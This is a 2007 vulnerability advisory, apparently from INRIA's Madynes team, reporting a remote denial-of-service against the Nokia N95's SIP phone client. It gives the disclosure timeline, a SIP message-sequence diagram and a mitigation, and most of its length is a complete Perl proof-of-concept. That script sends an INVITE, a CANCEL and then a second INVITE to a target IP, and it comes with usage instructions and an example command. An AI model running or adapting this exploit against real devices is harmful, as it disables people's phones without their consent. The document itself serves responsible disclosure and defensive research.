nokia-dos.txt

`Nokia N95 cellphone remote DoS using the SIP Stack  
  
  
  
Severity:  
  
High – Denial of Service  
  
  
  
Hardware:  
  
Nokia N95  
  
  
  
Firmware:  
  
Tested version: Nokia RM-159 V 12.0.013  
  
  
  
Notification:  
  
Vulnerability found: 11 September 2007  
  
Contact Nokia Support: 12 September 2007 / None reply Contact Nokia Security  
Support: 19 September 2007 / None reply  
  
  
  
Vulnerability Synopsis:  
  
If the device has the SIP Phone client activated, a sequence of SIP messages  
turn the device in an inconsistent state where the user is not able to  
operate it anymore until it reboots.  
  
  
  
The sequence of messages consists in 2 different SIP Dialogs where the first  
initiates an INVITE transaction but immediately closes it (in an anticipated  
manner). While, the second transaction initiates a normal INVITE transaction  
that trigger the vulnerability of the target.  
  
  
  
The sequence of messages is illustrated below.  
  
  
  
X ------------------------- INVITE -----------------------> Nokiav12  
  
X <---------------------- 100 Trying ---------------------- Nokiav12   
  
X ------------------------- CANCEL -----------------------> Nokiav12   
  
X <----------------- OK (to the Cancel) ------------------- Nokiav12  
  
X <---------------- 487 Request Terminated ---------------- Nokiav12  
  
  
  
--------New Dialog--------  
  
  
  
X ------------------------- INVITE -----------------------> Nokiav12  
  
X <---------------------- 100 Trying ---------------------- Nokiav12  
  
X <---------------------- 180 Trying ---------------------- Nokiav12  
  
  
  
---- The device does not work properly anymore ----  
  
  
  
Impact:  
  
A remote entity can take down all the services of the cell phone  
  
  
  
Resolution:  
  
As we did not get any proper reply from Nokia about the subject, the best  
way will be to disable the SIP Client  
  
  
  
Credits:  
  
Humberto J. Abdelnur (Ph.D Student)  
  
Radu State (Ph.D)  
  
Olivier Festor (Ph.D)  
  
  
  
This vulnerability was identified by the Madynes research team at INRIA  
Lorraine, using KiF the Madynes VoIP fuzzer.  
  
HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr/  
  
  
  
  
  
Proof of Concept:  
  
  
  
A perl script (nokiav12.pl) is attached to this mail. Before launching   
  
it, the SIP phone has to be initialed in the target device  
  
  
  
Command:  
  
perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>  
  
  
  
Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu  
  
  
  
  
  
#!/usr/bin/perl  
  
  
  
##################################################  
  
# Vulnerabily discovered using KiF ~ Kiph #  
  
# #  
  
# Authors: #  
  
# Humberto J. Abdelnur (Ph.D Student) #  
  
# Radu State (Ph.D) #  
  
# Olivier Festor (Ph.D) #  
  
# #  
  
# Madynes Team, LORIA - INRIA Lorraine #  
  
# HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr #  
  
##################################################  
  
  
  
use IO::Socket::INET;  
  
use String::Random;  
  
  
  
die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"   
  
unless ($ARGV[3]);  
  
  
  
$targetUser = $ARGV[1];  
  
$targetIP = $ARGV[0];  
  
  
  
$attackerUser = $ARGV[3];  
  
$attackerIP= $ARGV[2];  
  
  
  
$socket=new IO::Socket::INET->new(  
  
Proto=>'udp',  
  
PeerPort=>5060,  
  
PeerAddr=>$targetIP,  
  
LocalPort=>5060);  
  
  
  
$foo = new String::Random;  
  
$callid= $foo->randpattern("CCccnCn");  
  
$cseq = $foo->randregex('\d\d\d\d');  
  
  
  
$sdp = "v=0\r  
  
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r  
  
s=-\r  
  
c=IN IP4 $attackerIP\r  
  
t=0 0\r  
  
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r  
  
a=sendrecv\r  
  
a=ptime:20\r  
  
a=maxptime:200\r  
  
a=fmtp:96 mode-change-neighbor=1\r  
  
a=fmtp:18 annexb=no\r  
  
a=fmtp:98 0-15\r  
  
a=rtpmap:96 AMR/8000/1\r  
  
a=rtpmap:0 PCMU/8000/1\r  
  
a=rtpmap:8 PCMA/8000/1\r  
  
a=rtpmap:97 iLBC/8000/1\r  
  
a=rtpmap:18 G729/8000/1\r  
  
a=rtpmap:98 telephone-event/8000/1\r  
  
a=rtpmap:13 CN/8000/1\r  
  
";  
  
  
  
$sdplen= length $sdp;  
  
  
  
$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r  
  
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r  
  
From: <sip:$attackerUser\@$attackerIP>;tag=1\r  
  
To: <sip:$targetUser\@$targetIP>\r  
  
Call-ID: $callid\@$attackerIP\r  
  
CSeq: $cseq INVITE\r  
  
Max-Forwards: 70\r  
  
Contact: <sip:$attackerUser\@$attackerIP>\r  
  
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,   
  
MESSAGE\r  
  
Content-Type: application/sdp\r  
  
Content-Length: $sdplen\r  
  
\r  
  
$sdp";  
  
$socket->send($msg);  
  
$text = '';  
  
while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){  
  
$socket->recv($text,1024,0);  
  
}  
  
  
  
$msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r  
  
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r  
  
From: <sip:$attackerUser\@$attackerIP>;tag=1\r  
  
To: <sip:$targetUser\@$targetIP>;tag=1\r  
  
Call-ID: $callid\@$attackerIP\r  
  
CSeq: $cseq CANCEL\r  
  
Max-Forwards: 70\r  
  
Content-Length: 0\r  
  
\r  
  
";  
  
$socket->send($msg);  
  
time.sleep(1);  
  
$callid= $foo->randpattern("CCccnCn");  
  
$cseq = $foo->randregex('\d\d\d\d');  
  
$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r  
  
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r  
  
From: <sip:$attackerUser\@$attackerIP>;tag=2\r  
  
To: <sip:$targetUser\@$targetIP>\r  
  
Call-ID: $callid\@$attackerIP\r  
  
CSeq: $cseq INVITE\r  
  
Contact: <sip:$attackerUser\@$attackerIP>\r  
  
Max-Forwards: 70\r  
  
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,   
  
MESSAGE\r  
  
Content-Type: application/sdp\r  
  
Content-Length: $sdplen\r  
  
\r  
  
$sdp";  
  
$socket->send($msg);  
  
  
  
  
  
  
  
  
No virus found in this outgoing message.  
Checked by AVG Free Edition.   
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007  
19:31  
  
`